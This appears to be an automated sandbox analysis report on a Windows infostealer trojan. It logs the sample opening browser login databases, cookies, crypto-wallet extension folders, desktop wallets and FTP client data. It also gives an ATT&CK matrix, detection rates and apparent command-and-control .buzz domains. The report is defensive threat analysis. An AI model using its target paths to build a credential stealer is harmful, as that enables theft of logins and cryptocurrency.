Source: Yara match | File source: 00000000.00000003.1430582996.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: MPgkx6bQIQ.exe PID: 7680, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum-LTC
Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets\L
Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Jaxx Liberty
Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
Source: MPgkx6bQIQ.exe, 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: ExodusWeb35
Source: MPgkx6bQIQ.exe, 00000000.00000003.1515446456.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514103594.000000000303F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514103594.000000000303F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: keystore
Source: MPgkx6bQIQ.exe, 00000000.00000003.1514103594.000000000303F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Directory queried: C:\Users\user\Documents\EEGWXUHVUG
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: C:\Users\user\Desktop\MPgkx6bQIQ.exe | Directory queried: C:\Users\user\Documents\JDDHMPCDUJ
Source: Yara match | File source: 00000000.00000003.1514080921.0000000003047000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1693563145.0000000000968000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: MPgkx6bQIQ.exe PID: 7680, type: MEMORYSTR

                      Remote Access Functionality

Source: Yara match | File source: 0.3.MPgkx6bQIQ.exe.24d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.MPgkx6bQIQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.MPgkx6bQIQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.MPgkx6bQIQ.exe.24d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1430582996.00000000024D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: Process Memory Space: MPgkx6bQIQ.exe PID: 7680, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation (1); PowerShell (1); At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (1); Process Injection (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (4); Software Packing (22); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (11); Virtualization/Sandbox Evasion (1); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (22); Wi-Fi Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Screen Capture (1); Archive Collected Data (1); Data from Local System (41); Clipboard Data (2); Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (21); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (114); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Source | Detection | Scanner | Label | Link
MPgkx6bQIQ.exe | 42% | Virustotal | | Browse
MPgkx6bQIQ.exe | 55% | ReversingLabs | Win32.Trojan.AceCrypter |
MPgkx6bQIQ.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
https://avatars.fa | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
steamcommunity.com | 23.55.153.106 | true | false | | high
lev-tolstoi.com | 172.67.157.254 | true | false | | high
cashfuzysao.buzz | unknown | unknown | false | | high
scentniej.buzz | unknown | unknown | false | | high
inherineau.buzz | unknown | unknown | false | | high
prisonyfork.buzz | unknown | unknown | false | | high
rebuildeso.buzz | unknown | unknown | false | | high
appliacnesot.buzz | unknown | unknown | false | | high
hummskitnj.buzz | unknown | unknown | false | | high
screwamusresz.buzz | unknown | unknown | false | | high
